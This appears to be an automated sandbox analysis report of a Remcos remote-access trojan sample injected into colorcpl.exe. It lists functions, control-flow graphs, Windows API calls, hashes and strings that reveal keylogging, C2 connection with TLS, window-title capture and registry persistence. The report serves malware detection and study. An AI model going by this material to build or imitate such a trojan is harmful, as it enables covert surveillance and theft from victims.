                                                          • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\colorcpl.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                                          • API String ID: 2830904901-2432426600
                                                          • Opcode ID: 0d51bdbdf17ee4b71c296934935e56bd03d7a24d590b28e6b7766f77ffb5a7e2
                                                          • Instruction ID: a66bd0492fdb6d1de28f6c8d34cc403bfcbc4f8b87fe3dde9035776ea0c7746b
                                                          • Opcode Fuzzy Hash: 0d51bdbdf17ee4b71c296934935e56bd03d7a24d590b28e6b7766f77ffb5a7e2
                                                          • Instruction Fuzzy Hash: 7C32C070F082062AFE19B7709C69B6F769B4F817C4F40092DE7469B2D1EEA89D048F61
                                                          Function 02FA4F65 Relevance: 32.3, APIs: 5, Strings: 13, Instructions: 809sleepnetworkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 448 2fa4f65-2fa4fad call 2f920df call 2fab944 call 2f920df call 2f91e65 call 2f91fab call 2fcbb2c 461 2fa4faf-2fa4fb6 Sleep 448->461 462 2fa4fbc-2fa5008 call 2f92093 call 2f91e65 call 2f920f6 call 2fabeac call 2f9489e call 2f91e65 call 2f9b9f8 448->462 461->462 477 2fa500a-2fa5079 call 2f91e65 call 2f9247c call 2f91e65 call 2f91fab call 2f91e65 call 2f9247c call 2f91e65 call 2f91fab call 2f91e65 call 2f9247c call 2f91e65 call 2f91fab call 2f9473d 462->477 478 2fa507c-2fa5117 call 2f92093 call 2f91e65 call 2f920f6 call 2fabeac call 2f91e65 * 2 call 2f96c59 call 2f92f10 call 2f91fe2 call 2f91fd8 * 2 call 2f91e65 call 2f95b05 462->478 477->478 531 2fa5119-2fa5125 478->531 532 2fa5127-2fa512e 478->532 533 2fa5133-2fa51c5 call 2f95aa6 call 2f9531e call 2f96383 call 2f92f10 call 2f92093 call 2fab580 call 2f91fd8 * 2 call 2f91e65 call 2f91fab call 2f91e65 call 2f91fab call 2fa4f24 531->533 532->533 560 2fa5210-2fa521e call 2f9482d 533->560 561 2fa51c7-2fa520b WSAGetLastError call 2facb72 call 2f952fd call 2f92093 call 2fab580 call 2f91fd8 533->561 566 2fa524b-2fa5260 call 2f94f51 call 2f948c8 560->566 567 2fa5220-2fa5246 call 2f92093 * 2 call 2fab580 560->567 583 2fa5ade-2fa5af0 call 2f94e26 call 2f921fa 561->583 566->583 584 2fa5266-2fa53b9 call 2f91e65 * 2 call 2f9531e call 2f96383 call 2f92f10 call 2f96383 call 2f92f10 call 2f92093 call 2fab580 call 2f91fd8 * 4 call 2fab871 call 2fa45f8 call 2f99097 call 2fd1ed1 call 2f91e65 call 2f920f6 call 2f9247c call 2f91fab * 2 call 2fa3733 566->584 567->583 597 2fa5b18-2fa5b20 call 2f91e8d 583->597 598 2fa5af2-2fa5b12 call 2f91e65 call 2f91fab call 2fcbb2c Sleep 583->598 648 2fa53bb-2fa53c8 call 2f95aa6 584->648 649 2fa53cd-2fa53f4 call 2f91fab call 2fa35e1 584->649 597->478 598->597 648->649 655 2fa53fb-2fa57ba call 2f9417e call 2f9ddc4 call 2fabcd3 call 2fabdaf call 2fabc1f call 2f91e65 GetTickCount call 2fabc1f call 2fabb77 call 2fabc1f * 2 call 2fabb27 call 2fabdaf * 5 call 2f9f90c call 2fabdaf call 2f92f31 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 * 3 call 2f92ea1 call 2f92f10 call 2f96383 call 2f92f10 call 2f96383 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 call 2f96383 call 2f92f10 * 5 call 2f92ea1 call 2f92f10 call 2f92ea1 call 2f92f10 * 7 call 2f92ea1 649->655 656 2fa53f6-2fa53f8 649->656 782 2fa57bc call 2f94aa1 655->782 656->655 783 2fa57c1-2fa5a45 call 2f91fd8 * 50 call 2f91f09 call 2f91fd8 * 6 call 2f91f09 call 2f94c10 782->783 901 2fa5a4a-2fa5a51 783->901 902 2fa5a53-2fa5a5a 901->902 903 2fa5a65-2fa5a6c 901->903 902->903 904 2fa5a5c-2fa5a5e 902->904 905 2fa5a78-2fa5aaa call 2f95a6b call 2f92093 * 2 call 2fab580 903->905 906 2fa5a6e-2fa5a73 call 2f9b08c 903->906 904->903 917 2fa5abe-2fa5ad9 call 2f91fd8 * 2 call 2f91f09 905->917 918 2fa5aac-2fa5ab8 CreateThread 905->918 906->905 917->583 918->917
                                                          APIs
                                                          • Sleep.KERNEL32(00000000,00000029,030052F0,030050E4,00000000), ref: 02FA4FB6
                                                          • WSAGetLastError.WS2_32(00000000,00000001), ref: 02FA51C7
                                                          • Sleep.KERNEL32(00000000,00000002), ref: 02FA5B12
                                                            • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$ErrorLastLocalTime
                                                          • String ID: | $%I64u$5.1.3 Pro$C:\Windows\SysWOW64\colorcpl.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                                          • API String ID: 524882891-3481364104
                                                          • Opcode ID: 54c1df0ea7a22e009d1917cf2468260d7211cfe78ef699f70fa0c1bc5e28f2ae
                                                          • Instruction ID: 66b932d7bec0bf868719cf2b12d0b0e37cf15f2384881f2ec6535c2d8abd004e
                                                          • Opcode Fuzzy Hash: 54c1df0ea7a22e009d1917cf2468260d7211cfe78ef699f70fa0c1bc5e28f2ae
                                                          • Instruction Fuzzy Hash: 7A526971A041195AEF28F731ECA1BEEB37A9F50384F5045A9D60AA71D4EF305F4ACE90
                                                          Function 02F948C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • connect.WS2_32(?,?,?), ref: 02F948E0
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02F94A00
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 02F94A0E
                                                          • WSAGetLastError.WS2_32 ref: 02F94A21
                                                            • Part of subcall function 02FAB580: GetLocalTime.KERNEL32(00000000), ref: 02FAB59A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                          • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... | $X=t
                                                          • API String ID: 994465650-865183690
                                                          • Opcode ID: 538b03fc24d066da8d8af044f1e564fd6b4f78c0168a587399321393fd7f0a59
                                                          • Instruction ID: a65083fe081593fe3505ced22a1b7c523d3f545ea4d144df817b6df4c7038b47
                                                          • Opcode Fuzzy Hash: 538b03fc24d066da8d8af044f1e564fd6b4f78c0168a587399321393fd7f0a59
                                                          • Instruction Fuzzy Hash: 4241D579B102067BBF147B7A8D1A42DBB57EF512C4B800168DB0247AA5EF51E8258FE3
                                                          Function 02F9AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 02F9AD73
                                                          • Sleep.KERNEL32(000001F4), ref: 02F9AD7E
                                                          • GetForegroundWindow.USER32 ref: 02F9AD84
                                                          • GetWindowTextLengthW.USER32(00000000), ref: 02F9AD8D
                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 02F9ADC1
                                                          • Sleep.KERNEL32(000003E8), ref: 02F9AE8F
                                                            • Part of subcall function 02F9A671: SetEvent.KERNEL32(?,?,00000000,02F9B245,00000000), ref: 02F9A69D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                          • API String ID: 911427763-3954389425
                                                          • Opcode ID: 8c2f68a4de5b83df365e89e231e2bd37ae459f0c36cad797cdcb73912fd0ca63
                                                          • Instruction ID: 0df0cc171e9221f72244cc59102f1d1014e937b5fac4d306857b20208f5df02c
                                                          • Opcode Fuzzy Hash: 8c2f68a4de5b83df365e89e231e2bd37ae459f0c36cad797cdcb73912fd0ca63
                                                          • Instruction Fuzzy Hash: BD51C171A042499BFF14FB34DC54A7EB7ABAF843C8F10092DE786931A0EF649944CE52
                                                          Function 02F9DA6F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 02F9DBD5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LongNamePath
                                                          • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                          • API String ID: 82841172-425784914
                                                          • Opcode ID: 6c228a0726fbda021933a40f70f6a0a3067be20286d1c2d2d60d11d7fe460bc7
                                                          • Instruction ID: d3a7aafcf5fa68e9f8e8fe9000980e34485ca094ef9618599442fe8ee7bb3a4e
                                                          • Opcode Fuzzy Hash: 6c228a0726fbda021933a40f70f6a0a3067be20286d1c2d2d60d11d7fe460bc7
                                                          • Instruction Fuzzy Hash: 774157312082055AFA45FB64DD51DAFF3EAAEA07D5F10052DF74A920A0FF609949CE52
                                                          Function 02FAB354 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1214 2fab354-2fab3ab call 2fac048 call 2fa35e1 call 2f91fe2 call 2f91fd8 call 2f96b1c 1225 2fab3ee-2fab3f7 1214->1225 1226 2fab3ad-2fab3bc call 2fa35e1 1214->1226 1228 2fab3f9-2fab3fe 1225->1228 1229 2fab400 1225->1229 1230 2fab3c1-2fab3d8 call 2f91fab StrToIntA 1226->1230 1231 2fab405-2fab410 call 2f9537d 1228->1231 1229->1231 1236 2fab3da-2fab3e3 call 2facffa 1230->1236 1237 2fab3e6-2fab3e9 call 2f91fd8 1230->1237 1236->1237 1237->1225
                                                          APIs
                                                            • Part of subcall function 02FAC048: GetCurrentProcess.KERNEL32(?,?,?,02F9DAE5,WinDir,00000000,00000000), ref: 02FAC059
                                                            • Part of subcall function 02FA35E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 02FA3605
                                                            • Part of subcall function 02FA35E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 02FA3622
                                                            • Part of subcall function 02FA35E1: RegCloseKey.KERNEL32(?), ref: 02FA362D
                                                          • StrToIntA.SHLWAPI(00000000,02FFCA08,00000000,00000000,00000000,030050E4,00000003,Exe,00000000,0000000E,00000000,02FF60CC,00000003,00000000), ref: 02FAB3CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCurrentOpenProcessQueryValue
                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                          • API String ID: 1866151309-2070987746
                                                          • Opcode ID: 5250866101ff48dc79ce0037a90240e559ca20aa0451e6750e4ae2e71bd320a5
                                                          • Instruction ID: eaff605169588bccd480b22c53ddc7112cda5ef57664958574c799ae312d33c3
                                                          • Opcode Fuzzy Hash: 5250866101ff48dc79ce0037a90240e559ca20aa0451e6750e4ae2e71bd320a5
                                                          • Instruction Fuzzy Hash: E91159B0E4024A1AFB00F368CCA6E7F7B5B8F612C8F800126D707A31D0FB54580A8BE1
                                                          Function 02F9A761 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • Sleep.KERNEL32(00001388), ref: 02F9A77B
                                                            • Part of subcall function 02F9A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02F9A788), ref: 02F9A6E6
                                                            • Part of subcall function 02F9A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,02F9A788), ref: 02F9A6F5
                                                            • Part of subcall function 02F9A6B0: Sleep.KERNEL32(00002710,?,?,?,02F9A788), ref: 02F9A722
                                                            • Part of subcall function 02F9A6B0: CloseHandle.KERNEL32(00000000,?,?,?,02F9A788), ref: 02F9A729
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02F9A7B7
                                                          • GetFileAttributesW.KERNEL32(00000000), ref: 02F9A7C8
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 02F9A7DF
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 02F9A859
                                                            • Part of subcall function 02FAC516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02F9A87E), ref: 02FAC52F
                                                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,02FF6478,?,00000000,00000000,00000000,00000000,00000000), ref: 02F9A962
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                          • String ID:
                                                          • API String ID: 3795512280-0
                                                          • Opcode ID: 91139218005abf815b71415ac24a2165605351a92b712010769fd80af357e7b5
                                                          • Instruction ID: 22a45a30fee5d11b0154c625aa41f72e64dfb4ab4ffe68c58098a39503ddcd26
                                                          • Opcode Fuzzy Hash: 91139218005abf815b71415ac24a2165605351a92b712010769fd80af357e7b5
                                                          • Instruction Fuzzy Hash: 33517D716082095AFF15FB34CC64ABF73AB9F813C8F00092DE746971E1EF6499098E92
                                                          Function 02FAC482 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1386 2fac482-2fac493 1387 2fac4ab-2fac4b2 1386->1387 1388 2fac495-2fac498 1386->1388 1391 2fac4b3-2fac4cc CreateFileW 1387->1391 1389 2fac49a-2fac49f 1388->1389 1390 2fac4a1-2fac4a9 1388->1390 1389->1391 1390->1391 1392 2fac4ce-2fac4d0 1391->1392 1393 2fac4d2-2fac4d7 1391->1393 1394 2fac510-2fac515 1392->1394 1395 2fac4d9-2fac4e7 SetFilePointer 1393->1395 1396 2fac4f2-2fac503 WriteFile 1393->1396 1395->1396 1399 2fac4e9-2fac4f0 CloseHandle 1395->1399 1397 2fac507-2fac50e CloseHandle 1396->1397 1398 2fac505 1396->1398 1397->1394 1398->1397 1399->1392
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,02FAC5A1,00000000,00000000,?), ref: 02FAC4C1
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,02F9A922,?,00000000,00000000), ref: 02FAC4DE
                                                          • CloseHandle.KERNEL32(00000000,?,02F9A922,?,00000000,00000000), ref: 02FAC4EA
                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,02F9A922,?,00000000,00000000), ref: 02FAC4FB
                                                          • CloseHandle.KERNEL32(00000000,?,02F9A922,?,00000000,00000000), ref: 02FAC508
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreatePointerWrite
                                                          • String ID:
                                                          • API String ID: 1852769593-0
                                                          • Opcode ID: 057525f76ab4f96b238024b59015c4ecb715da4135e85494f95c71a0cab5e959
                                                          • Instruction ID: 31cc30d0cf98f83b4a2794dc0098537d916bfe8a0111a23361da1f62143ee435
                                                          • Opcode Fuzzy Hash: 057525f76ab4f96b238024b59015c4ecb715da4135e85494f95c71a0cab5e959
                                                          • Instruction Fuzzy Hash: BB1108F2644115BFEB114A24EE98F7BB39CEB422E5F008A2BFB11D72C0C7608C008674
                                                          Function 02F9A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,02F9A2B8,?,00000000,00000000), ref: 02F9A239
                                                          • CreateThread.KERNEL32(00000000,00000000,02F9A2A2,?,00000000,00000000), ref: 02F9A249
                                                          • CreateThread.KERNEL32(00000000,00000000,02F9A2C4,?,00000000,00000000), ref: 02F9A255
                                                            • Part of subcall function 02F9B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 02F9B1AD
                                                            • Part of subcall function 02F9B19F: wsprintfW.USER32 ref: 02F9B22E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTimewsprintf
                                                          • String ID: Offline Keylogger Started
                                                          • API String ID: 465354869-4114347211
                                                          • Opcode ID: e59ef1762c28a75f8cd37254819ed9068702b3801e8065605500bbf4edeab8eb
                                                          • Instruction ID: e9fdad1fb79102e0e8b3b20c9cff3db1077c05febcbd34f0647d50b45ea9c7e6
                                                          • Opcode Fuzzy Hash: e59ef1762c28a75f8cd37254819ed9068702b3801e8065605500bbf4edeab8eb
                                                          • Instruction Fuzzy Hash: 1C11CAB56002087EBA20BB35DC96C7F776EDE816D8B40052DFB4612155EA61AD14CFF2
                                                          Function 02F94F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1422 2f94f51-2f94f5f 1423 2f94fea 1422->1423 1424 2f94f65-2f94f6c 1422->1424 1425 2f94fec-2f94ff1 1423->1425 1426 2f94f6e-2f94f72 1424->1426 1427 2f94f74-2f94f7b 1424->1427 1428 2f94fc0-2f94fe8 CreateEventA CreateThread 1426->1428 1427->1428 1429 2f94f7d-2f94fbb GetLocalTime call 2fabc1f call 2f952fd call 2f92093 call 2fab580 call 2f91fd8 1427->1429 1428->1425 1429->1428
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000001,03004EE0,03005598,?,?,?,?,02FA5D11,?,00000001), ref: 02F94F81
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,03004EE0,03005598,?,?,?,?,02FA5D11,?,00000001), ref: 02F94FCD
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 02F94FE0
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 02F94F94
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$EventLocalThreadTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 2532271599-1507639952
                                                          • Opcode ID: 805df25eddab79111a3b0f2f1b89d7ca25416c9678479aca0d598824b476e3e9
                                                          • Instruction ID: abc91a99ddaa17f42b02c81c9da4694cd95487779b8d63495ef445aa77ca3fa4
                                                          • Opcode Fuzzy Hash: 805df25eddab79111a3b0f2f1b89d7ca25416c9678479aca0d598824b476e3e9
                                                          • Instruction Fuzzy Hash: F811CA35D002856AEF22A7B69C0CF9BBFAD9FD2798F04050EE64257250D6B49446CBB1
                                                          Function 02FA37AA Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 02FA37B9
                                                          • RegSetValueExA.KERNEL32(?,02FF74C8,00000000,?,00000000,00000000,030052F0,?,?,02F9F88E,02FF74C8,5.1.3 Pro), ref: 02FA37E1
                                                          • RegCloseKey.KERNEL32(?,?,?,02F9F88E,02FF74C8,5.1.3 Pro), ref: 02FA37EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
                                                          • API String ID: 1818849710-4028850238
                                                          • Opcode ID: 5fef1608d9244c50bb6bd09a315254264fd40574823fdd7f85a7c709ae61fdb1
                                                          • Instruction ID: a44e8245ab2b9172234d4488ad4b1781c90e786b7dc2135c04dc27e49e5d8f06
                                                          • Opcode Fuzzy Hash: 5fef1608d9244c50bb6bd09a315254264fd40574823fdd7f85a7c709ae61fdb1
                                                          • Instruction Fuzzy Hash: 17F06D7294011CFBDF01AFA0DC55EEA7B6CEF04690F104654FE0AAA110EB319E14DBA0
                                                          Function 02F94CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,03004F50), ref: 02F94DB3
                                                          • CreateThread.KERNEL32(00000000,00000000,?,03004EF8,00000000,00000000), ref: 02F94DC7
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 02F94DD2
                                                          • CloseHandle.KERNEL32(?,?,00000000), ref: 02F94DDB
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 3360349984-0
                                                          • Opcode ID: 95beb50d56e50969a101e67026ce2f13f41ebdc1aadac153418a9e12e548a631
                                                          • Instruction ID: 598ed9cd16d9cd3004c29ed3825696d9c1007e6e2ce344f2016fc8a3179427c5
                                                          • Opcode Fuzzy Hash: 95beb50d56e50969a101e67026ce2f13f41ebdc1aadac153418a9e12e548a631
                                                          • Instruction Fuzzy Hash: BE41E671548305AFEF11FB60CD44EBFB7EEAF94390F00092DFA8682190DB2099098F61
                                                          Function 02F9A6B0 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02F9A788), ref: 02F9A6E6
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,02F9A788), ref: 02F9A6F5
                                                          • Sleep.KERNEL32(00002710,?,?,?,02F9A788), ref: 02F9A722
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02F9A788), ref: 02F9A729
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                          • String ID:
                                                          • API String ID: 1958988193-0
                                                          • Opcode ID: f03e2c1799d6985fb7d26ee7211ccc0130ece65debda131be1beebd32c46724e
                                                          • Instruction ID: 8533f5a2fb7d456f6d801034936feb0c12351546bc8201ad524c9ba16177c892
                                                          • Opcode Fuzzy Hash: f03e2c1799d6985fb7d26ee7211ccc0130ece65debda131be1beebd32c46724e
                                                          • Instruction Fuzzy Hash: 8A112030A45644AEFF32A728DCD962E7BBBEB462D9F440808E38247586C7575854CF27
                                                          Function 02F9482D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WS2_32(?,00000001,00000006), ref: 02F94852
                                                          • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,02F9530B,?,?,00000000,00000000,?,Offline Keylogger Started,00000000,02F95208,?,00000000), ref: 02F9488E
                                                            • Part of subcall function 02F9489E: WSAStartup.WS2_32(00000202,00000000), ref: 02F948B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateEventStartupsocket
                                                          • String ID: X=t
                                                          • API String ID: 1953588214-2691586945
                                                          • Opcode ID: 0c89d50d013901c9a7dc0c9836d1c72733055d65910da43bbd6694f27edfebb0
                                                          • Instruction ID: 0d26b1cc09b9d12538aa6a09d262811f2dac7ed659ea63b5694937cb739af053
                                                          • Opcode Fuzzy Hash: 0c89d50d013901c9a7dc0c9836d1c72733055d65910da43bbd6694f27edfebb0
                                                          • Instruction Fuzzy Hash: 0A017171808BC09FEB359F28A449786BFE4AB15314F044D5EF1D697B91D7B5A441CF10
                                                          Function 02FA4F24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • getaddrinfo.WS2_32(00000000,00000000,00000000,X=t,030050E4,00000000,02FA51C3,00000000,00000001), ref: 02FA4F46
                                                          • WSASetLastError.WS2_32(00000000), ref: 02FA4F4B
                                                            • Part of subcall function 02FA4DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 02FA4E10
                                                            • Part of subcall function 02FA4DC1: LoadLibraryA.KERNEL32(?), ref: 02FA4E52
                                                            • Part of subcall function 02FA4DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 02FA4E72
